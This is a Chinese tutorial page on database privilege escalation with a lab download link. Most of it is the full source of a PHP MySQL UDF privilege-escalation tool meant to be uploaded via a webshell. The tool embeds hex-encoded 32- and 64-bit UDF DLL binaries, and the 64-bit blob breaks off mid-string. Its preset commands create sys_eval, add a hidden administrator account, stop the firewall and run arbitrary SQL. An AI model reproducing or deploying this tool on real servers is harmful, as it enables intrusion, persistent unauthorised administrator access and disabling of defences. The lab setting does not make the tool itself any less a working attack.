登录 注册

数据库提权

  1. 靶场地址:

    1.  mssql提权oracle提权仔细看使用说明需要修改当前绑定IP
 https://pan.baidu.com/s/13rdGmscjy-n_iUG1ZyW_Iw?pwd=cong
 解压密码vmlwrtg%$^sdfgg 
 administrator/abc123!

  2. UDF 提权

    1. 以有 webshell

      1. 通过 webshell 将脚本上传可访问路径

        1.  <?php
 if (get_magic_quotes_gpc()) { 
 function stripslashes_deep($value) 
 { 
 $value = is_array($value) ? 
 array_map('stripslashes_deep', $value) : 
 stripslashes($value); 

 return $value; 
 } 

 $_POST = array_map('stripslashes_deep', $_POST); 
 $_GET = array_map('stripslashes_deep', $_GET); 
 $_COOKIE = array_map('stripslashes_deep', $_COOKIE); 
 $_REQUEST = array_map('stripslashes_deep', $_REQUEST); 
 } 

 session_start();
 if($_GET['action']=='logout'){
 foreach($_COOKIE["connect"] as $key=>$value){
 setcookie("connect[$key]","",time()-1);
 }
 header("Location:".$_SERVER["SCRIPT_NAME"]);
 }






 if(!empty($_POST['submit'])){
 setcookie("connect[host]",$_POST['host']);
 setcookie("connect[name]",$_POST['name']);
 setcookie("connect[pass]",$_POST['pass']);
 setcookie("connect[db]",$_POST['db']);
 $_COOKIE["connect"]["host"];
 echo "<script>location.href='?action=connect'</script>";
 }





 if(empty($_GET["action"])){
 ?>


 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>暗月mysql全版本通杀提权神器(mOon原创)</title>
 </head>








 <body>
 <form method="post" action="?action=connect">
 <table  border="1" align="center" width="300">
  <caption><h5>暗月mysql全版本通杀提权神器(mOon原创)</h5></caption>
 <tr>
 	<td width="50">HOST:</td>
 	<td width="450"><input type="text" name="host" value="localhost" size="40"></td>
 </tr>
 <tr>
 	<td>NAME:</td>
 	<td><input type="text" name="name" value="root" size="40"></td>
 </tr>
 <tr>
 	<td>PASS:</td>
 	<td><input type="text" name="pass" value="" size="40"></td>
 </tr>

 <tr>
 	<td>DB:</td>
 	<td><input type="text" name="db" value="mysql" size="40"></td>
 </tr>

 <td colspan="2"><div align="center">
           <input type="submit" name="submit" value="提交">
 		   
           <input type="reset" name="Submit" value="重置">
         </div></td>
 </table>


 </form>
 <div align="center"><strong>Copyright By mOon 2014</strong><br>
 <span> <font color="red">黑客居家旅游杀人放火爆菊必备暗器</font></span><br>
 Blog:<a href="http://www.moonsec.com" target="_blank">www.moonsec.com</a> Bbs:<a href="http://www.moonsafe.com" target="_blank">www.moonsafe.com</a>
 <a href="http://www.moonsec.com" target="_blank">版本更新</a>
 </div>

 </body>
 </html>



 <?php
 exit;

 }



 echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';




 $link = mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);

 if(!$link){
 echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
 exit;
 }else{
 echo "连接成功<br>";
 echo "版本信息:<br>";
 $str=mysql_get_server_info();
 echo 'MYSQL版本:'.$str."<br>";
 foreach(_ver() as $key=>$value){
 echo $key."-----".$value."<br>";
 } 
 echo "<hr>";
 if($str[2]>=1){
 $pa=str_replace('\\','/',_dir());
  $path=$_SESSION['path']=$pa."/moonudf.dll";
 }else{
 $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
 }

 }

 $conn=mysql_select_db($_COOKIE["connect"]["db"],$link);
 if(!$conn){
 echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
 exit;
 }else{
 echo "数据库--".$_COOKIE['connect']['db']."--存在<br>";
 }
 echo '<a href="?action=logout">点击退出</a><br>';

 echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
 echo  '<table width="680" height="53" border="1">';
 echo    '<tr>';
 echo      '<td colspan="2">当前路径:';  
 echo      "<input name='p' type='text' size='100' value='".dirname(__FILE__)."\'></td>";
 echo    '</tr>';
 echo    '<tr>';
 echo     '<td width="235"><input type="file" name="file"></td>';
 echo      '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
 echo    '</tr>';
 echo  '</table>';
 echo'</form>';
 if($_POST['subfile']){
 $upfile=$_POST['p'].$_FILES['file']['name'];

 if(is_uploaded_file($_FILES['file']['tmp_name']))
 			{
 if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
 echo '上传失败';
 }else{
 echo '上传成功,路径为'.$upfile;
 	  }

 			}

 					}

 echo '<hr>';
 echo '选择UDF导出的版本 win32 & win64 默认32位';
 echo '<form action="?action=dll" method="post"/>';
 echo '<input type="radio" name="udf" value="32" checked="checked">win32&nbsp';
 echo '<input type="radio" name="udf" value="64">win64&nbsp';
 echo '<hr>';
 echo '<table cellpadding="1" cellspacing="2">';
 echo '<tr><td>路径目录为:</td></tr>';
 echo "<tr><td><input type='text' name='dll' size='100' value='$path'/></td>";
 echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
 echo '</table>';
 echo '</form>'; 
 echo '<hr>';



 if($_POST['subudf']){

 	if($_POST['udf']=="32"){

 			$shellcode=mysql86();

 	}else{
 			$shellcode=mysql64();
 	}


 mysql_query('DROP TABLE Temp_udf');
 $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
 if(!$query){
 echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
 }else{
 $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
 if(!mysql_query($query)){
 echo 'udf插入失败请查看失败内容'.mysql_error();
 }else{
 $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
 if(!mysql_query($query)){
 echo 'udf导出失败请查看失败内容'.mysql_error();
 }else{
 mysql_query('DROP TABLE Temp_udf');
 echo '导出成功';
 }
 }
 }
 }


 echo '<form name="form2" method="post" action="">';
 echo  '<table width="680" height="100" border="1.2" cellpadding="0" cellspacing="1">';
 echo    '<tr>';
 echo      '<td width="100">文件路径:</td>';
 echo      '<td width="620"><input name="diy" type="text" id="diy" size="50"></td>';
 echo    '</tr>';
 echo    '<tr>';
 echo      '<td>目标路径:</td>';
 echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
 echo    '</tr>';
 echo    '<tr>';
 echo      '<td colspan="2">';

 echo        '<div align="right">';
 echo          '<input type="submit" name="Submit2" value="自定义导出">';
 echo      '</div></td></tr>';
 echo '</table>';
 echo '</form>';

 if(!empty($_POST['diy'])){
 $diy=str_replace('\\','/',$_POST['diy']);
 $diypath=str_replace('\\','/',$_POST['diypath']);
 mysql_query('DROP TABLE diy_dll');
 $s='create table diy_dll (cmd LONGBLOB)';
 if(!mysql_query($s)){
 echo '创建diy_dll表失败'.mysql_error();
 }else{
 $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
 if(!mysql_query($s)){
 echo "插入自定义文件失败".mysql_error();
 }else{
 $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
 if(!mysql_query($s)){
 echo "导出自定义dll出错".mysql_error();
 }else{
 mysql_query('DROP TABLE diy_dll');
 echo "成功出自定义dll<br>";
 }

 }

 }

 }

 echo "<hr>";
 echo '自带命令:<br>';
 echo '<form action="" method="post">';
 echo '<select name="mysql">';
 echo '<option value="create function sys_eval returns string soname \'moonudf.dll\'">创建sys_eval</option>';
 echo '<option value="select sys_eval(\'net user moon$ 123456 /add & net localgroup administrators moon$ /add\')">添加超级管理员</option>';
 echo '<option value="select sys_eval(\'net user\')">查看用户</option>';
 echo '<option value="select sys_eval(\'netstat -an\')">查看端口</option>';
 echo '<option value="select sys_eval(\'net stop sharedacess\')">停止防火墙</option>';
 echo '<option value="select name from mysql.func">查看创建函数</option>';
 echo '<option value="delete from mysql.func where name=\'sys_eval\'">删除sys_eval</option>';
 echo '</select>';
 echo '&nbsp<input type="submit" value="提交" />';
 echo '</form>';

 echo '<form action="?action=sql" method="post">';
 echo '自定义SQL语句:<br>';
 echo '<textarea name="mysql" cols="90" rows="10"></textarea>';
 echo '&nbsp<input type="submit" value="执行" />';
 echo '</form>';

 echo "回显结果:<br>";
 echo '<textarea cols="90" rows="10" id="contactus" name="contactus">';
 if(!empty($_POST['mysql'])){
 echo "SQL语句:".$sql=$_POST['mysql']."\r\n";

 $sql=mysql_query($sql) or die(mysql_error());
 while($rows=@mysql_fetch_row($sql)){
 foreach($rows as $value){

 echo iconv("UTF-8", "GB2312//IGNORE",  $value);

 }
 }

 }

 echo '</textarea>';

 echo '<hr>';
 print("
 本版支持mysql win32 & win64位 提权
 但是少了某些提权功能例如反弹函数
 需要使用反弹函数 请使用以前的版本但是不支持64位的mysql

 ");


 function _dir(){
 	$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
 	$row=mysql_query($sql);
 	$rows=mysql_fetch_row($row);
 	return  $rows[1];

 }
 function _ver(){
 	$_version=array();
 	$sql="show variables like '%version%'";
 	$row=mysql_query($sql);
 	while($rows=mysql_fetch_row($row)){

 	$_version += array($rows[0]=>$rows[1]);


 	}
 	return $_version;


 }



 function mysql86(){


 return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";



 }

 function mysql64(){

 return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D1B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF0300004C8BC78BD3488BCE488B5C2430488